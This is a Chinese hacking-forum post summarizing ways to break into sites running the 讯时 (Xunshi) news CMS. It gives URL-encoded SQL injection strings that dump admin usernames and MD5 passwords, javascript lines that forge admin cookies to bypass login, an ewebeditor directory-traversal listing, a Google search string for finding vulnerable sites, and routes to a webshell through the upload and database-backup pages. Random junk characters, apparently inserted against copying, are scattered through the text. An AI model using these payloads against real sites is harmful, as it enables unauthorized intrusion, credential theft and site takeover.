讯时漏洞总结

admin

by:血封忆尘
6 G! r% u5 q, s9 d0 M; L0 @
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）

以下本文总结来自黑防去年第9期杂志上的内容...
' N- e4 r! K% P, r+ |4 H
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
- ]) E( U+ ]2 S$ P/ K
2 Y& ]0 _' D2 L: o26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

0 x0 G& ]6 I' X* a; h3 v% X% Y- I记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
这里一个注入
* F' L+ M9 s2 ^
; W( p) b6 `8 D+ q" ?7 ]效果如图:



这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
2 H) N& u% @/ W2 o- p
& P9 p+ k  \& @$ [- G0 c3 P密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
) w. f( j3 b# C! ?( ?1 v: K; @
  s* C0 ?" O" {1 b9 xjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞

% i7 ^6 p3 r' r$ x$ x5 k' ?! p它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
/ C$ o" W) J  D. b$ N
0 `; D$ r8 `- b8 A: d; q( J) w访问这页面来列目录..步骤如下:

! i% o' l2 ^2 x% M, Njavascript:alert(document.cookie="admindj=1")

http://www.political-security.co ... asp?id=46&dir=../..

* H$ x. m+ [* N; _" a" Y; U* [7 w效果如图:

+ @- B' q. k7 X* s
, Y6 a2 ]7 e, }! E! x5 G
, B5 ]* `* E2 P这样全站目录都能瞧了..找到后台目录..进去..

那么进了后台怎么拿shell？？上传--备份就ok了..

那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

1 ^! K7 V) ~- A: T; b( X0 {1 \$ Y- m这个我也碰到过一次..你都可以通过列目录来实现..

javascript:alert(document.cookie="admindj=1")
3 @& T/ `0 }* Q( v
: W0 [& V% S1 s! s0 s; phttp://www.political-security.co ... p?action=BackupData

备份ok..

那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?

在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
0 q% E$ x" I+ D: m+ Q/ P& u
然后访问此页面进行注入..步骤如下:

javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

然后请求admin/admin_chk.asp页面

* t, t" C% }7 @; _2 k输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

3 N. b9 j" v7 i9 a* I* C% [26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

' b( o% S. _7 }! t效果如图所示:
: e9 N0 a2 u9 I9 q! h* }! f5 _


% f  H2 i' U# r6 T; N- Y1 n$ `讯时漏洞2
google关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
( `; G' r. F' Z5 M( J! P% n4 e
1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句
! U- s1 }$ t- l6 l  U7 O, {8 q& `* K
5 X3 g5 O& R% v$ K2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！



, M; |4 ?) S* k4 H, }; ~$ ^3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
: l/ c5 h) k% z: B9 A# h
1 \& X/ v  ?3 y/ P$ `

爆出管理员帐号和密码了

' n3 p/ O. t8 @

4、cookies进后台
" w# A3 ~' x9 V- r. R  o
3 L; j7 d5 @( _7 U1 h3 o, C' b- Xjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

5 T2 F5 n3 M9 {* O

5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！
0 g$ I" W; X$ n0 L8 y1 B. T6 X1 F2 w

1 @& ~  E- [  Y  w6 a0 V2 P
6、后台有上传和备份取SHELL不难。
+ @' `4 B$ c& s7 r7 w
7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..

# D6 H3 R. x6 n- R* k逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
2 E7 O$ N  U* G& R) k+ ]" }" ^
5 z+ |8 e- Z, Z& t" Y  Q